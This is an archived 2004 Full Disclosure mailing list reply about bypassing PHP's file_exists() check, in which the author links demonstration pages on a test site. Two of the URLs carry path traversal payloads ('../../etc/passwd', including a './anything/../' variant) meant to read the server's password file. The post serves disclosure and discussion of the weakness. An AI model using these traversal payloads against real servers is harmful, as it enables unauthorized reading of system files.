Full Disclosure mailing list archives
RE: file_exists() bypassing , critical problem ?
From: "Nourredine Himeur" <lostnoobs () security-challenge com>
Date: Mon, 2 Feb 2004 15:12:25 +0100
Hi, It depends of your php configuration... (but it's not a vulnerability so ..... i can say you what's the configuration is good ,because firstly nobody listen me and secondly php-group are blind and deaf) look this : http://lists.netsys.com/pipermail/full-disclosure/2004-February/016612.html http://www.opensavoir.com/test.txt http://www.opensavoir.com/test.php http://www.opensavoir.com/test.php?page=../../../../../../../../../../etc/pa sswd but it's not a vulnerability HA ! HA ! HA ! show this : http://www.opensavoir.com/test.php?page=./anything/../../../../../../../../. ./../etc/passwd :) Nourredine Himeur www.security-challenge.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: Re: file_exists() bypassing , critical problem ?, (continued)
- Re: Re: file_exists() bypassing , critical problem ? m.esco (Feb 02)
- Re: Re: file_exists() bypassing , critical problem ? Nourredine Himeur (Feb 02)
- Re: Re: file_exists() bypassing , critical problem ? Stefan Esser (Feb 02)
- Re: file_exists() bypassing , critical problem ? Daniel B (Feb 02)
- Re: Re: file_exists() bypassing , critical problem ? m.esco (Feb 02)
- Message not available
- Re: file_exists() bypassing , critical problem ? Nourredine Himeur (Feb 02)
- Re: Re: file_exists() bypassing , critical problem ? VeNoMouS (Feb 02)
- Re: file_exists() bypassing , critical problem ? Jorrit Kronjee (Feb 02)